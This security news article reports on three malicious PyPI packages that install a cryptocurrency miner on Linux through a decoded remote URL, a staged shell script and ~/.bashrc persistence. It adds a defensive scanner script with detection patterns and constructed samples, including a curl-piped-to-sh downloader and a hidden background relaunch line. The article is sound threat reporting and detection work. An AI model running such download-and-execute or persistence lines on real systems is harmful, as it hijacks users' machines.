3 Malicious PyPI Packages Hide CoinMiner on Linux Devices
In a recent cybersecurity revelation, the Python Package Index (PyPI) has fallen victim to the infiltration of three malicious packages: modularseven, driftme, and catme. These packages, although now removed, managed to amass a concerning 431 downloads within the past month, posing a significant threat to the security of Linux devices.
The Cryptocurrency Mining Connection
Fortinet FortiGuard Labs researcher Gabby Xiong found, on closer inspection, that these packages resemble one used in a previous campaign, culturestreak. Like that predecessor, the new packages deploy a CoinMiner executable on Linux devices on first use, making cryptocurrency mining the primary threat.
These malicious PyPI packages hide their payload to reduce the detectability of their code. The primary technique is to host the payload at a remote URL referenced from the package's __init__.py file: this file decodes the URL and retrieves the first stage from a remote server, a shell script named “unmi.sh”, which in turn fetches a configuration file and the CoinMiner executable hosted on GitLab.
Execution and Persistence
The ELF binary is then executed in the background with the nohup command, so the process keeps running even after the user ends the session. Notably, these packages improve on the culturestreak package by adding an extra stage: the shell script conceals the malicious intent, helping the packages evade security software and prolonging the exploitation.
The hosting of the coin-mining executables on a public GitLab repository and of the configuration file on the domain papiculo[.]net reveals the ties to the culturestreak package. This connection highlights a worrying pattern of harmful packages being distributed from common origins, underscoring the necessity for increased awareness among Python developers.
Additionally, the introduction of malicious commands into the ~/.bashrc file in these PyPI packages ensures the malware’s persistence and reactivation on the user’s device. This strategic move enables a prolonged, stealthy exploitation of the user’s device for the benefit of the attacker.
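The two behaviours described above (an __init__.py that decodes a remote URL at import time and pipes a fetched script into a shell, and lines appended to ~/.bashrc that relaunch a hidden background binary) are cheap to triage with static heuristics. The following scanner is an added example written for this article; it is not code from the FortiGuard report or from the packages themselves. The indicator patterns, function names and the sample __init__.py and ~/.bashrc contents are constructed for illustration (the base64 literal decodes to a placeholder URL on the reserved example.invalid domain).

```python
"""Heuristic triage for two staging/persistence tricks described in the article:
an import-time downloader in a package's __init__.py and a background relaunch
appended to ~/.bashrc. Constructed example, not the report's or the packages' code."""
import base64
import re
from pathlib import Path

# Indicators an analyst would flag in code that runs at import time.
INIT_PATTERNS = {
    "base64_decode": re.compile(r"base64\.b64decode\("),
    "shell_exec": re.compile(r"\b(os\.system|subprocess\.(run|Popen|call|check_output))\("),
    "download_tool": re.compile(r"\b(curl|wget)\b"),
    "shell_pipe": re.compile(r"\|\s*(ba)?sh\b"),
    "nohup": re.compile(r"\bnohup\b"),
}

# Indicators for lines appended to a shell rc file.
BASHRC_PATTERNS = {
    "nohup_background": re.compile(r"\bnohup\b.*&\s*$"),
    "hidden_path_exec": re.compile(r"(^|\s)(\./|~/|/tmp/|/var/tmp/)\.[\w-]+"),
    "download_and_run": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
}

# A quoted base64-looking literal of at least 16 characters.
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{16,}={0,2})['"]""")


def decode_embedded_b64(text):
    """Return (literal, decoded) pairs for base64 literals that decode to a URL,
    the encoding trick the article describes for the first-stage fetch."""
    hits = []
    for m in B64_LITERAL.finditer(text):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except Exception:  # not valid base64 or not text: ignore
            continue
        if decoded.startswith(("http://", "https://")):
            hits.append((m.group(1), decoded))
    return hits


def scan_init_source(text):
    """Return sorted indicator names that match plus any decoded URLs."""
    indicators = sorted(name for name, rx in INIT_PATTERNS.items() if rx.search(text))
    urls = [url for _, url in decode_embedded_b64(text)]
    return {"indicators": indicators, "decoded_urls": urls}


def scan_bashrc(text):
    """Return (line_no, [indicators], line) for suspicious non-comment rc lines."""
    flagged = []
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        names = [name for name, rx in BASHRC_PATTERNS.items() if rx.search(stripped)]
        if names:
            flagged.append((no, names, stripped))
    return flagged


def scan_installed_packages(site_packages):
    """Scan every top-level __init__.py under a site-packages directory."""
    results = {}
    for init in Path(site_packages).glob("*/__init__.py"):
        r = scan_init_source(init.read_text(errors="replace"))
        if r["indicators"] or r["decoded_urls"]:
            results[init.parent.name] = r
    return results


# Constructed sample inputs (not real malware); the URL is a placeholder.
SAMPLE_INIT = '''
import base64, subprocess
_u = base64.b64decode("aHR0cDovL2V4YW1wbGUuaW52YWxpZC9zdGFnZTEuc2g=").decode()
subprocess.run("curl -s " + _u + " | sh", shell=True)
'''

SAMPLE_BASHRC = '''
# ~/.bashrc
export PATH="$HOME/.local/bin:$PATH"
alias ll='ls -alF'
nohup ~/.cache/.x -c ~/.cache/.cfg >/dev/null 2>&1 &
'''

if __name__ == "__main__":
    print(scan_init_source(SAMPLE_INIT))
    for hit in scan_bashrc(SAMPLE_BASHRC):
        print(hit)
```

Run it against a real environment with scan_installed_packages(site.getsitepackages()[0]) and the contents of ~/.bashrc; both functions only read files, so they are safe to use during incident triage on a suspect host. The patterns are deliberately broad and will flag legitimate packages that shell out or decode base64, so treat a hit as a prompt to read the code, not as a verdict.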
The discovery of these malicious PyPI packages underscores the evolving sophistication of cyber threats targeting the Python development ecosystem. Developers and security experts must remain vigilant, implementing robust measures to detect and prevent the infiltration of malicious packages.
The sources for this article include a story from TheHackerNews.